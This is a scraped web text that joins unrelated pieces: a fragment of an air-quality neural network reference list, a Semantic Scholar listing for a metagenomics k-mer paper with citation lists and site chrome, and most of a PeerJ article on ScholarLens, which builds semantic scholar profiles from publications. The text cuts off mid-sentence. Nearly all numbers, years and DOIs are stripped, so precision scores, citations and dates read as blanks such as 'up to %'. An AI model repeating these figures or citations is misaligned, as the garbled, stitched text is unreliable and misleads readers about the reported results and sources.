kukkonen, leena partanen, ari karppinen, juhani ruuskanen, heikki junninen, mikko kolehmainen, harri niska, stephen dorling, tim chatterton, rob foxall, gavin cawley. extensive evaluation of neural network models for the prediction of no and pm concentrations, compared with a deterministic modelling system and measurements in central helsinki [j]. atmospheric environment, , ( ). [ ] hunt k.j., sbarbaro d., Żbikowski r., gawthrop p. j. neural networks for control systems†”a survey [j]. pergamon, , ( ). [pdf] multiple comparative metagenomics using multiset k-mer counting | semantic scholar skip to search formskip to main content> semantic scholar's logo search sign increate free account you are currently offline. some features of the site may not work correctly. doi: . /peerj-cs. corpus id: multiple comparative metagenomics using multiset k-mer counting @article{benoit multiplecm, title={multiple comparative metagenomics using multiset k-mer counting}, author={g. benoit and p. peterlongo and m. mariadassou and erwan drezen and sophie schbath and d. lavenier and c. lemaitre}, journal={peerj comput. sci.}, year={ }, volume={ }, pages={e } } g. benoit, p. peterlongo, + authors c. lemaitre published computer science, biology peerj comput. sci. background large scale metagenomic projects aim to extract biodiversity knowledge between different environmental conditions. current methods for comparing microbial communities face important limitations. those based on taxonomical or functional assignation rely on a small subset of the sequences that can be associated to known organisms. on the other hand, de novo methods, that compare the whole sets of sequences, either do not scale up on ambitious metagenomic projects or do not provide… expand view pdf on arxiv save to library create alert cite launch research feed share this paper citationshighly influential citations background citations methods citations results citations view all supplemental presentations presentation slides multiple comparative metagenomics using multiset k-mer counting explore further discover more papers related to the topics discussed in this paper figures, tables, and topics from this paper table figure figure table figure figure figure figure figure figure view all figures & tables metagenomics mer k-mer de novo transcriptome assembly taxonomy (general) ab initio quantum chemistry methods citations citation type citation type all types cites results cites methods cites background has pdf publication type author more filters more filters filters sort by relevance sort by most influenced papers sort by citation count sort by recency libra: scalable k-mer–based tool for massive all-vs-all metagenome comparisons illyoung choi, alise j ponsero, m. bomhoff, k. youens-clark, j. hartman, b. hurwitz computer science, medicine gigascience highly influenced pdf view excerpts, cites background, methods and results save alert research feed simkamin: fast and resource frugal de novo comparative metagenomics gaetan benoit, m. mariadassou, s. robin, s. schbath, p. peterlongo, c. lemaitre computer science, medicine bioinform. pdf save alert research feed identifying group-specific sequences for microbial communities using long k-mer sequence signatures y. wang, lei fu, jie ren, z. yu, ting chen, f. sun biology, medicine front. microbiol. view excerpt, cites methods save alert research feed a new alignment-free whole metagenome comparison tool and its application on gut microbiomes of wild giant pandas jiuhong dong, s. liu, yaran zhang, y. dai, qi wu biology, medicine frontiers in microbiology view excerpts, cites methods save alert research feed recentrifuge: robust comparative analysis and contamination removal for metagenomics jose manuel martí computer science, medicine plos comput. biol. pdf save alert research feed comparison of microbiome samples: methods and computational challenges m. comin, b. camillo, cinzia pizzi, fabio vandin computer science, medicine briefings bioinform. save alert research feed recentrifuge: robust comparative analysis and contamination removal for metagenomic data jose manuel martí biology view excerpt, cites methods save alert research feed fast approximation of frequent k-mers and applications to metagenomics. leonardo pellegrina, cinzia pizzi, fabio vandin computer science, medicine journal of computational biology : a journal of computational molecular cell biology save alert research feed ardep, a rapid degenerate primer design pipeline based on k-mers for amplicon microbiome studies yueni wu, k. feng, ziyan wei, zhujun wang, y. deng biology, medicine international journal of environmental research and public health pdf view excerpt, cites methods save alert research feed apples: scalable distance-based phylogenetic placement with or without alignments m. balaban, shahab sarmashghi, siavash mirarab computer science pdf save alert research feed ... ... references showing - of references sort byrelevance most influenced papers recency commet: comparing and combining multiple metagenomic datasets n. maillet, g. collet, thomas vannier, d. lavenier, p. peterlongo computer science, biology ieee international conference on bioinformatics and biomedicine (bibm) pdf view excerpts, references methods and background save alert research feed metafast: fast reference-free graph-based comparison of shotgun metagenomic data v. ulyantsev, s. kazakov, v. dubinkina, a. tyakht, d. alexeev computer science, medicine bioinform. pdf view excerpts, references methods save alert research feed assessment of k-mer spectrum applicability for metagenomic dissimilarity analysis v. dubinkina, d. ischenko, v. ulyantsev, a. tyakht, d. alexeev biology, computer science bmc bioinformatics highly influential view excerpts, references methods and background save alert research feed compareads: comparing huge metagenomic experiments n. maillet, c. lemaitre, r. chikhi, d. lavenier, p. peterlongo medicine, biology bmc bioinformatics view excerpt, references methods save alert research feed a novel abundance-based algorithm for binning metagenomic sequences using l-tuples yu-wei wu, y. ye biology, medicine j. comput. biol. pdf view excerpt, references background save alert research feed spaced seeds improve k-mer-based metagenomic classification k. brinda, maciej sykulski, g. kucherov biology, computer science bioinform. pdf save alert research feed exploration and retrieval of whole-metagenome sequencing samples s. seth, niko välimäki, samuel kaski, antti honkela biology, medicine bioinform. pdf view excerpt, references background save alert research feed exploration and retrieval of whole-metagenome sequencing s. seth, samuel kaski, antti honkela biology save alert research feed identification and assembly of genomes and genetic elements in complex metagenomic samples without using reference genomes h. nielsen, mathieu almeida, + authors s. ehrlich biology, medicine nature biotechnology pdf view excerpt, references background save alert research feed a guide to enterotypes across the human body: meta-analysis of microbial community structures in human microbiome datasets o. koren, d. knights, + authors r. ley biology, computer science plos comput. biol. pdf save alert research feed ... ... related papers abstract supplemental presentations figures, tables, and topics citations references related papers stay connected with semantic scholar sign up about semantic scholar semantic scholar is a free, ai-powered research tool for scientific literature, based at the allen institute for ai. learn more → resources datasetssupp.aiapiopen corpus organization about usresearchpublishing partnersdata partners   faqcontact proudly built by ai with the help of our collaborators terms of service•privacy policy the allen institute for ai by clicking accept or continuing to use the site, you agree to the terms outlined in our privacy policy, terms of service, and dataset license accept & continue submitted july accepted june published july corresponding author bahar sateli, sateli@semanticsoftware.info academic editor kathryn laskey additional information and declarations can be found on page doi . /peerj-cs. copyright sateli et al. distributed under creative commons cc-by . open access scholarlens: extracting competences from research publications for the automatic generation of semantic user profiles bahar sateli , felicitas löffler , birgitta könig-ries and rené witte semantic software lab, department of computer science and software engineering, concordia university, montreal, quebec, canada heinz-nixdorf-chair for distributed information systems, department of mathematics and computer science, friedrich schiller university jena, jena, germany abstract motivation. scientists increasingly rely on intelligent information systems to help them in their daily tasks, in particular for managing research objects, like publications or datasets. the relatively young research field of semantic publishing has been addressing the question how scientific applications can be improved through semantically rich representations of research objects, in order to facilitate their discovery and re-use. to complement the efforts in this area, we propose an automatic workflow to construct semantic user profiles of scholars, so that scholarly applications, like digital libraries or data repositories, can better understand their users’ interests, tasks, and competences, by incorporating these user profiles in their design. to make the user profiles sharable across applications, we propose to build them based on standard semantic web technologies, in particular the resource description framework (rdf) for representing user profiles and linked open data (lod) sources for representing competence topics. to avoid the cold start problem, we suggest to automatically populate these profiles by analyzing the publications (co-)authored by users, which we hypothesize reflect their research competences. results. we developed a novel approach, scholarlens, which can automatically generate semantic user profiles for authors of scholarly literature. for modeling the competences of scholarly users and groups, we surveyed a number of existing linked open data vocabularies. in accordance with the lod best practices, we propose an rdf schema (rdfs) based model for competence records that reuses existing vocabularies where appropriate. to automate the creation of semantic user profiles, we developed a complete, automated workflow that can generate semantic user profiles by analyzing full-text research articles through various natural language processing (nlp) techniques. in our method, we start by processing a set of research articles for a given user. competences are derived by text mining the articles, including syntactic, semantic, and lod entity linking steps. we then populate a knowledge base in rdf format with user profiles containing the extracted competences.we implemented our approach as an open source library and evaluated our system through two user studies, resulting in mean average precision (map) of up to %. as part of the evaluation, we also analyze the impact of semantic zoning of research articles on the accuracy of the resulting profiles. finally, we demonstrate how these semantic user profiles can be applied in a number of use cases, including article ranking for personalized search and finding scientists competent in a topic —e.g., to find reviewers for a paper. how to cite this article sateli et al. ( ), scholarlens: extracting competences from research publications for the automatic generation of semantic user profiles. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:sateli@semanticsoftware.info https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. availability. all software and datasets presented in this paper are available under open source licenses in the supplements and documented at http://www.semanticsoftware. info/semantic-user-profiling-peerj- -supplements. additionally, development releases of scholarlens are available on our github page: https://github.com/ semanticsoftwarelab/scholarlens. subjects human-computer interaction, artificial intelligence, data mining and machine learning, digital libraries keywords natural language processing, semantic user profile, semantic publishing, scholarly user modeling, linked open data introduction researchers increasingly leverage intelligent information systems for managing their research objects, like datasets, publications, or projects. an ongoing challenge is the overload scientists face when trying to identify relevant information, for example when using a web-based search engine: while it is easy to find numerous potentially relevant results, evaluating each of these is still performed manually and thus very time-consuming. we argue that smarter scholarly applications require not just a semantically rich representation of research objects, but also of their users: by understanding a scientist’s interests, competences, projects and tasks, intelligent systems can deliver improved results, e.g., by filtering and ranking results through personalization algorithms (sieg, mobasher & burke, ). so-called user profiles (brusilovsky & millán, ) have been adopted in domains like e-learning, recommender systems or personalized news portals (we provide a brief background on user profiling in the ‘background’). increasingly, they also receive more and more attention in scientific applications, such as expertise retrieval systems. constructing such user models automatically is still a challenging task and even though various approaches have already been proposed, a semantic solution based on linked open data (lod) (heath & bizer, ) principles is still missing. we show that a semantically rich representation of users is crucial for enabling a number of advanced use cases in scholarly applications. one of our central points is that a new generation of semantic user profile models are ideally built on standard semantic web technologies, as these make the profiles accessible in an open format to multiple applications that require deeper knowledge of a user’s competences and interests. in the ‘literature review’, we analyze a number of existing lod vocabularies for describing scholars’ preferences and competences. however, they all fall short when it comes to modeling a user’s varying degrees of competence in different research topics across different projects. we describe our solution for scholarly user models in the ‘design’. bootstrapping such a user profile is an infamous issue in recommendation approaches, known as the cold start problem, as asking users to manually create possibly hundreds of entries for their profile is not realistic in practice. our goal is to be able to create an accurate profile of a scientist’s competences, which we hypothesize can be automatically calculated sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements http://www.semanticsoftware.info/semantic-user-profiling-peerj- -supplements https://github.com/semanticsoftwarelab/scholarlens https://github.com/semanticsoftwarelab/scholarlens http://dx.doi.org/ . /peerj-cs. figure this diagram shows a high-level overview of our approach to semantic user profiling: users can bootstrap their profiles by providing a set of their (co-)authored publications. the extracted knowl- edge is then stored in a knowledge base that can be incorporated in various scholarly applications. re- searchers can then obtain personalized services through applications leveraging the semantic user profiles. based on the publications of each user. towards this end, we developed a novel nlp-based method for analyzing full-text research articles to extract an author’s competences and constructing semantic user profiles in a linked open data format for automatic knowledge base construction. our ideas are implemented in scholarlens library, which we believe is the first open source library that facilitates the automatic construction of scholarly user profiles. the design and implementation of scholarlens are detailed in ‘design’ and ‘implementation’, respectively. a high-level overview of our approach is illustrated in fig. . to evaluate our profile generation approach, we performed two user studies with ten and twenty-five scientists from various research groups across europe and north america. the participants were provided with two different user profiles each, which were automatically generated based on their publications: one based on the articles’ full texts, the second restricted to rhetorical entities (res), like the claims and contributions in a paper (sateli & witte, ). in each study, we asked the participants to evaluate the generated top-n competence entries in their user profiles. the results, provided in the ‘evaluation’, show that our approach can automatically generate user profiles with a precision of up to % (mean average precision for top- competences). sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. finally, we illustrate in the ‘application examples’ how semantic user profiles can be leveraged by scholarly information systems in a number of use cases, including a competence analysis for a user (e.g., for finding reviewers for a new paper) and re-ranking of article search results, based on a user’s profile. background in this section, we provide background information on user profiling, competence management and its applications. we also briefly introduce semantic publishing and its connections with natural language processing (nlp) techniques. user profiling and personalization a user profile is an instance of a user model that contains either a user’s characteristics, such as knowledge about a topic, interests and backgrounds, or focuses on the context of a user’s work, e.g., location and time (brusilovsky & millán, ). depending on the application offering personalized content, different features have to be taken into account when modeling user profiles. for instance, educational learning systems typically model a user’s knowledge and background, whereas recommender systems and search applications are more focused on a user’s interests. constructing user profiles requires collecting user information over an extended period of time. this gathering process is called user profiling and distinguishes between explicit and implicit user feedback (gauch et al., ). explicit user feedback actively requests interests from a user, whereas implicit user feedback derives preferences from the user’s activities. commonly used implicit profiling techniques observe the user’s browsing behavior and extract preferences from web or query logs, analyze the browser history and derive interest weights from the numbers of clicks or the time spent on a page. according to findings in gauch et al. ( ), there is no significant evidence that an explicit user feedback mechanism results in better personalized content than implicitly recorded user information. therefore, personalized applications nowadays mainly employ implicit profiling techniques, since they are less intrusive from a user’s perspective. in the context of scholarly applications, user profiles have been used in ad-hoc approaches, such as the expertise retrieval system used at tilburg university (uvt) (https: //www.tilburguniversity.edu/), academic search engines like aminer (https://aminer.org) or personalized paper recommendations in google scholar (https://scholar.google.com). the most dominant representation of user characteristics in this type of application is a weighted vector of keywords. this simple mathematical description permits classical information filtering algorithms, such as cosine similarity (manning, raghavan & schütze, ), in order to measure item-to-item, user-to-user and item-to-user similarity. competence management e-learning applications were the earliest systems to provide personalized content based on a user’s background knowledge and skill sets. the identified competence gaps were used to find appropriate learning strategies to gain the required knowledge to pass a course or to fulfill a certain task. sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.tilburguniversity.edu/ https://www.tilburguniversity.edu/ https://aminer.org https://scholar.google.com http://dx.doi.org/ . /peerj-cs. according to the definition in hr-xml-consortium ( ), a competency is ‘‘a specific, identifiable, definable, and measurable knowledge, skill, ability and/or other deployment- related characteristic (e.g., attitude, behavior, physical ability) which a human resource may possess and which is necessary for, or material to, the performance of an activity within a specific business context’’. draganidis & mentzas ( ) further analyzed the term competency and outlined four dimensions a competence can be described along: category (generic term for a group of similar skills), competency (the description of the competence term), definition (user scenarios that illustrate this competence) and demonstrated behaviour (explanations that clarify if the desired competency has been achieved). the terms competence and competency are usually used synonymously. however, teodorescu ( ) argues that there is a subtle difference in their meaning: while competency is mainly focused on the description of skills a person is supposed to possess in order to achieve a certain target, the term competence actually points to the measurement of skills to determine a certain level of expertise. while we appreciate this distinction, we consider the terms as synonymous in this article, but for the sake of consistency use the term competence. semantic publishing the emerging research domain of semantic publishing aims at making scientific knowledge accessible to both humans and machines. semantic technologies have become increasingly important in the management of research objects. they enable automated systems to understand the meaning (semantics) and infer additional knowledge from published documents and data (berners-lee & hendler, ; shadbolt, hall & berners-lee, ). essential building blocks for the creation of structured, meaningful web content are information extraction and semantic annotations. these annotations are added to documents using special markups with predefined meanings to explicitly mark their structure (e.g., different sections of an article) and semantics (e.g., a publication’s contributions, methods, or application domains) (sateli & witte, ). the semantically annotated documents can then be used in a multitude of applications, for example, in information retrieval systems, by finding specific document sections or measuring the similarity of different articles’ contributions. in recent years, the semantic publishing community increasingly built and adopted controlled vocabularies, based on semantic web technologies, for describing research objects. however, despite the promises of better knowledge access (berners-lee & hendler, ; shotton, ), the manual annotation of existing research literature is prohibitively expensive for a wide-spread adoption. consequently, a significant focus of research in the semantic publishing domain is dedicated to finding automatic approaches to annotate the wealth of existing scientific literature with shared vocabularies, based on approaches from the natural language processing and text mining domains. literature review we focus our review on two core aspects: firstly, existing semantic vocabularies that describe scholars in academic institutions with their publications and competences, in sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. order to establish semantic user profiles. and secondly, we examine existing approaches for automatic profile generation through nlp methods. vocabularies for scholarly user modeling in the area of user modeling, a multitude of semantic approaches have emerged in the last decade that go beyond representing users interests with keywords in favour of using concepts of domain ontologies, for example in a vector-based model (sieg, mobasher & burke, ; cantador & castells, ). in addition to providing a common understanding of domain knowledge, using semantic technologies also fosters the evolution towards more generic user models. an important goal of generic user modeling is facilitating software development and promoting reusability (kobsa, ) of profiles across applications or platforms. semantic web technologies, such as the representation of user characteristics in an rdf or web ontology language (owl) (https://www.w .org/owl/) compliant format can leverage this idea. in the following section, we review different proposals for generic user and competence modeling with semantic web vocabularies. furthermore, we discuss scholarly ontologies that describe users, institutions and publications in the scientific domain. vocabularies for competence modeling from paquette ( )’s perspective, competences are phrases that connect a user’s skills and positions to knowledge. this idea is reflected in his proposed competence ontology containing five main concepts, namely, competence statement, competence, skill, knowledge entity and resource. paquette further developed his ontology into sub-ontologies for skills and performance indicators that could be incorporated in ontology-driven e-learning systems. however, paquette’s ontology was designed to be used within his proposed software framework and is essentially missing connections to other existing ontologies. another ontology approach is proposed by fazel-zarandi & fox ( ). based on the assumption that someone who possesses appropriate skills is able to perform certain tasks, the ontology models skills at a certain level of proficiency and permits inter-linking with activities and knowledge fields. the intelleo competence ontology (jovanovic et al., ) aggregates the findings from different competence ontologies (schmidt & kunzmann, ; sandberg, ; sitthisak, gilbert & davis, ; paquette, ; sicilia, ; sampson & fytros, ) and defines a competence with respect to the corresponding domain-topic, skill and competence level. the intelleo ontology permits defining a competence as a prerequisite for another competence and provides the vocabulary for describing the process of gaining that specific skill. a competence record, hence, comprises a certain competence level, the source where the acquired competence has been achieved, as well as the date and methods that have been utilized to verify the acquisition. vocabularies for semantic user profiles gumo (heckmann et al., ) was the first generic user model approach, designed as a top-level ontology for universal use. this owl-based ontology focuses on describing a user in a situational context, offering several classes for modeling a user’s sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.w .org/owl/ http://dx.doi.org/ . /peerj-cs. personality, characteristics and interests. background knowledge and competences are considered only to a small degree. in contrast, the intelleo (http://intelleo.eu/) ontology framework is strongly focused on personalization and enables describing preferences, tasks and interests. the intelleo framework consists of multiple rdfs-based ontologies, including vocabularies for user and team modeling, as well as competences as we described in ‘vocabularies for competence modeling’. the intelleo vocabularies are inter-linked with other user model ontologies, such as friend of a friend (foaf) (http://www.foaf-project.org/). thanks to the simplicity and inter-linking of foaf to other linked open vocabularies (lovs), it has become very popular in recent years and is integrated in numerous personalized applications (celma, ; raad, chbeir & dipanda, ; orlandi, breslin & passant, ). foaf’s rdf-based vocabulary provides for describing basic user information with predefined entities, such as name, email, homepage, and interests, as well as modeling both individuals and groups in social networks. however, foaf does not provide comprehensive classes for describing preferences and competences, so that it would become directly usable within a scholarly application context. other ontologies aiming to unify user modeling vocabularies in semantic web applications are the scrutable user modeling infrastructure (sumi) (kyriacou, davis & tiropanis, ) and the ontology developed by golemati et al. ( ). besides general user information such as contact, address, preferences, education and profession, (golemati et al., ) also provides a vocabulary for a user’s activities in a given timeline. in contrast, sumi (kyriacou, davis & tiropanis, ) models user interests from the profiling perspective, which can be either explicitly given by the user or implicitly recorded by the system. the user model in sumi is divided into four categories. the first two categories contain the manually provided user information: (i) generic personal user data and (ii) interests that are only specific for a certain application, e.g., preferences that are only applicable within the ‘amazon.com’ platform. sumi automatically stores the recorded user preferences in two further categories: (i) generic application information that are valid across different service providers and (ii) application-specific data that is only used for a certain service. neither sumi nor golemati’s approach are inter-linked with other vocabularies, and they are also not maintained anymore. vocabularies for modeling scholars for modeling scholars in the scientific domain, vivo (http://vivoweb.org/ontology/core#) (börner et al., ) is the most prominent approach that has been used in numerous applications (http://duraspace.org/registry/vivo). it is an open source suite of web applications and ontologies used to model scholarly activities across an academic institution. however, vivo offers no support for content adaptation, due to missing classes for user interests, preferences and competences. another vocabulary modeling scientists and publications in research communities is the semantic web for research communities (swrc) (http://ontoware.org/swrc/), which was developed to provide an ontological infrastructure for semantic information portals (gonzalez & stumme, ; haase et al., ). the semantic web portal ontology (swpo) (http://sw-portal.deri.org/ontologies/swportal) uses the foaf, sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://intelleo.eu/ http://www.foaf-project.org/ http://vivoweb.org/ontology/core# http://duraspace.org/registry/vivo http://ontoware.org/swrc/ http://sw-portal.deri.org/ontologies/swportal http://dx.doi.org/ . /peerj-cs. table comparison of existing user model and scholarly vocabularies: high denotes that the vocabulary provides numerous classes and prop- erties for the description of that entity. medium means several classes and properties are available to define that entity and low states that there is only one class and property available. n/a indicate that this entity is not covered by the vocabulary. name coverage scientist role document research object project competence task interest vivo high high high medium low n/a n/a low lsc low n/a medium low low n/a n/a low swpo medium n/a medium n/a low n/a low low swrc medium medium medium n/a low n/a n/a n/a aiiso medium high n/a n/a low n/a n/a low foaf low n/a low n/a low n/a n/a low gumo low low n/a n/a n/a medium n/a high intelleo low low low n/a low high medium medium (http://purl.org/net/nknouf/ns/bibtex), time (http://www.wsmo.org/ontologies/ datetime#) and dcmi metadata (http://purl.org/dc/elements/ . /) vocabularies to model researchers with their personal and scholarly activities, like publications and conferences. the goal of swpo was to design a vocabulary to use within a portal application, where researchers working within a common scientific area can communicate with each other. the linked science core vocabulary (lsc) (http://linkedscience.org/lsc/ns#) provides a set of vocabularies for describing and interlinking researchers, publications and scientific data. lsc is very limited in its expressiveness and uses a small number of classes for describing research rhetoric elements in publications (e.g., hypothesis, data, method), rather than modeling researchers and their context. aiiso, the academic institution internal structure ontology (http://purl.org/vocab/aiiso/schema), is a linked open vocabulary for describing the roles people play within various internal entities of an academic institution through its integration with foaf and participation vocabularies. one of the use cases we had in mind when designing our scholarlens methodology was its application within sophisticated information filtering systems for scholars that consider a user’s research background. therefore, we explored the generic user models and scholarly ontologies reviewed above, in order to determine how well they can express features of scientific user modeling. the outcome of our study is summarized in table : scientist describes how well general user information about a scholar including name, address, affiliation, department and contact details can be defined. the ability to represent a user’s roles, e.g., a student, a post-doc or a professor, is expressed with role. document refers to all kinds of scholarly publications and research object comprises the possibility to define all different types of data used or produced in scientific workflows. a user might be involved in different research projects, which is addressed with the concept project. competence points to the possibility of characterizing a user’s expertise; whereas task covers how well a user’s responsibilities can be described. interest refers to a user’s preferences and interests for certain topics. a comprehensive description of an academic user is provided by vivo. this ontology is widely used in applications at academic institutions for representing general user sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://purl.org/net/nknouf/ns/bibtex http://www.wsmo.org/ontologies/datetime# http://www.wsmo.org/ontologies/datetime# http://purl.org/dc/elements/ . / http://linkedscience.org/lsc/ns# http://purl.org/vocab/aiiso/schema http://dx.doi.org/ . /peerj-cs. information and specific research areas and background. however, it does not provide for personalization, due to missing classes for user interests and preferences. in contrast to vivo, the intelleo ontology framework is strongly focused on personalization and offers several classes for preferences, tasks and competences. the most prominent, but also most basic user model ontology is foaf, which provides only very few classes and properties for user modeling. implicit profile generation generic user modeling requires new methods for user profiling. merely observing a user’s browsing behavior is not enough for various tasks a scholar is involved in. more complex user information can be obtained from, e.g., context resources, such as affiliations a scholar is associated with, but also from content sources, for instance, a user’s publications. utilizing nlp techniques in user modeling has quite a long history (zukerman & litman, ) and has also become important in recent years in information retrieval (ir) for extracting named entities from scientific papers in order to profile scholars and to find an expert in a certain topic. therefore, in the following subsections we focus on related work in expert profiling based on publications. since social media offers an abundance of user information, we also report on implicit profiling approaches using data from social networks that are targeted at general users, rather than only scholars. expert profiling in information retrieval certain tasks in research require finding experts with adequate background knowledge and skills. this so-called expertise retrieval gained a lot of attention in the information retrieval community (balog et al., ), in particular with the expert finding task at the enterprise track of the nist ( ) competition, which leveraged the idea of finding the right person with proper competences. based on a corpus of different kinds of documents, such as web pages, source code files and emails from mailing-lists, the task was to return a ranked list of persons with appropriate background knowledge in a given domain. however, as balog & de rijke ( ) point out, just matching people and domains in isolation is not enough: expert seekers often want to retrieve context information about a scholar’s research network. the information with whom a person corresponds or collaborates might provide evidence on his or her establishment in the research community. thus, it is getting more and more important to create comprehensive expert profiles, rather than just finding experts in documents for a given topic. balog and rijke clearly distinguish between expert finding and expert profiling. according to their definition, expert finding addresses the problem of finding experts for certain topics, based on a given set of documents, while expert profiling aims at creating profiles of individuals. the main goal in expert profiling is to establish a description of a person’s competences and his or her social network. they divide the task of expert profiling into two stages: extracting topics and determining a person’s competence in that topic. here, competence is modeled as an association between query terms (topics) and candidate experts, where associations are mainly established based on textual evidence. a simple association would be the authorship of publications, where the content of the papers are the textual evidence of the candidate’s sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. expertise: ‘‘the stronger the association between a person and a topic, the likelier it is that the person is an expert on that topic’’ (balog et al., ). different approaches have emerged in expertise retrieval for modeling these associations. according to balog et al. ( ), they can be grouped into five categories: generative probabilistic models, such as language or topic models, which determine the likelihood that a given topic is linked to a person, discriminative models computing the conditional probability that a tuple of topic and candidate expert is relevant, voting models that describe the generation of associations as a voting process, where scores from different sources are combined, graph-based models that analyze relationships among people and documents and describe associations along nodes (people and documents) and directed edges (conditions), as well as other models covering the broad spectrum of other approaches for modeling associations. as balog et al. ( ) point out, comparing all of the above mentioned approaches is a difficult task, since they are all influenced by different variables and components. furthermore, they are often built into larger applications, where only the final system was evaluated. therefore, balog et al. ( ) only analyzed the range of the best score from the main test collections: w c (http://research.microsoft.com/en-us/um/people/nickcr/w c- summary.html) and cerc (http://es.csiro.au/cerc/) (both from trec) and the uvt expert collection (http://ilps.science.uva.nl/resources/tu-expert-collection/) which is a collection of public data from about , experts from uvt. the mean average precision (map) scores in the w c collection varies between . and . on a query set from and between . and . on the dataset from the trec competition. it needs to be considered that in this trec collection, no actual ‘relevance assessment’ has been made, as the membership of the w c people in different working groups was used to derive that a person has expertise in a certain topic. the map values from the cerc collection range from . to . , whereas the map values for the expert profiling task on the uvt collection varies between . and . . in the uvt collection, the ground truth was explicitly given by the users, as they provide a description of their research areas together with keywords from a topic hierarchy. another notable example for an expertise retrieval system is aminer (https://aminer.org) (tang et al., ), a system that combines user profiling and document retrieval techniques. general user information, such as affiliation and position, as well as research interests and research networks are presented in textual and visual form. the profiling approach consists of three main steps: profile extraction, author name disambiguation and user interest discovery. profile extraction points to collecting general user information from web pages. given a scholar’s name, a binary classifier selects web pages according to features, like a person’s name appearing in a page title. all retrieved pages are tagged with categories that are used to generate profile properties, including affiliation, email, address and phone numbers. extracting research interests are left out in this step, since not all scholars enumerate their interests on their web pages. in addition, research interests should be proved by textual evidence. in a second step, aminer attempts to link documents with the basic user profiles, in order to obtain a list of a scholar’s publications. in this step, aminer uses publications from different online digital libraries, e.g., dblp or acm. to solve the name disambiguation problem (i.e., two scholars with the same name), they sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://research.microsoft.com/en-us/um/people/nickcr/w c-summary.html http://research.microsoft.com/en-us/um/people/nickcr/w c-summary.html http://es.csiro.au/cerc/ http://ilps.science.uva.nl/resources/tu-expert-collection/ https://aminer.org http://dx.doi.org/ . /peerj-cs. developed a probabilistic model based on author names. in the final step, they determine user interests from the generated linked list of papers. interests are described based on the detected topics. a topic consists of a mixture of words and probabilities being associated with that word. they propose a probabilistic model called author-conference-topic (act) model, where ‘conference’ comprises all kinds of publications, namely journals, conferences and articles. the idea behind this approach is that an author writing a paper uses different words based on her research interests, which denote the topic distribution. the discovered topic distributions are used as research interests and are stored together with the general information in an extended foaf format, in what they call a researcher network knowledge base (rnkb). for the evaluation, they utilized pooled relevance judgments (buckley & voorhees, ) and human judgments. seven people rated the retrieved expert lists for topic queries along four expertise levels: definite expertise, expertise, marginal expertise and no expertise. the judges were taught to do the rating according to a guideline following certain criteria, such as how many publication the retrieved scholar actually has for the given topic or how many awards she has received or conferences attended. in a final step, the judgment scores were averaged. in their experiments, they tested different language models along with their act model, which was shown to outperform the other models in the best run (p@ : . %, p@ : . %, map: %). expert profiling using text mining generating scholarly profiles has not only been investigated in information retrieval, but also in the computational linguistics domain. a first expert profiling approach using linked open data is suggested by buitelaar & eigner ( ). they define simple linguistic patterns to identify competences in a user’s research publications. bordea & buitelaar ( b) further developed that idea using a gate pipeline (bordea & buitelaar, a) that finds pre-defined skill types in research papers. they define skill types as general domain words that represent theoretical and practical expertise, such as method, algorithm or analysis. additionally, they applied an adapted td-idf filtering algorithm and removed terms from the final list that were considered too broad. in bordea et al. ( ), they extended their system with semantic linking to dbpedia ontology concepts (http://wiki.dbpedia.org/services-resources/ontology) and attempt to find a corresponding concept in the linked open data cloud for each extracted topic. for the evaluation, they conducted a user study with three domain experts, using their own corpus. the users were asked to judge a limited list of ranked topics for a given domain. the list was divided into three sections, top, middle and bottom, and the judges classified the provided topics into good, bad or undecided. finally, the kappa statistic was applied to aggregate the three judgments. overall, % of the top ranked topics were marked as good. according to recent findings letierce et al. ( ), social media platforms are widely used among scientists to share research news. nishioka & scherp ( ) generated scholarly profiles out of social media items, namely twitter (http://www.twitter.com), for recommending scientific publications. they examine different factors influencing the recommendation process, such as profiling method, temporal decay (sliding window and exponential decay) and richness of content (full-text and title versus title only). regarding sateli et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://wiki.dbpedia.org/services-resources/ontology http://www.twitter.com http://dx.doi.org/ . /peerj-cs. the profiling method, they took into account the following filtering methods: cf-idf, an adapted tf-idf algorithm using concepts of ontologies instead of full-text terms, hcf-idf, their own extended hierarchical approach and latent dirichlet allocation (lda) (blei, ng & jordan, ) topic modeling. for both user tweets and publications, they extract concepts with corresponding labels in the underlying knowledge base through gazetteers. by means of the stanford core nlp (http://stanfordnlp.github.io/corenlp/) tools, they remove stop words and twitter hashtags. in their evaluation with participants and around , scientific publications from economics, they analyzed in total different recommendation strategies, derived as combinations from the three influencing factors and their sub-factors. the participants obtained the top- recommendations for each of the strategies and rated the presented publication list on a binary scale. their results reveal that the most effective strategy was the one with the cf-idf filtering, the sliding window, and with full-texts and titles. additionally, it turned out that using titles only in combination with the hcf-idf filtering produces similarly good recommendations. implicit profiling in social media in the last decade, using social media platforms for implicit user profile generation attracted increasing attention (szomszor et al., ; abel et al., ; stankovic, rowe & laublet, ). through a number of different nlp methods, ‘interesting’ topics are extracted from short messages or social network posts. linkedvis (bostandjiev, o’donovan & höllerer, ) for instance is an interactive recommender system that generates career recommendations and supports users in finding potentially interesting companies and specific roles. linkedvis developers designed four different user models based on data from linkedin (https://www.linkedin.com) and extract interests and preferences from a user’s connections, roles and companies. two of the four constructed profiles contained meaningful entities instead of plain keywords. a part-of-speech tagger was utilized to find noun phrases that were mapped to wikipedia articles. the evaluation with a leave-one-out cross-validation revealed that the user models with semantic enrichment produced more accurate and diverse recommendations than the profiles based on tf-idf weights and occurrence matching. another approach using nlp methods for online profile resolution is proposed by 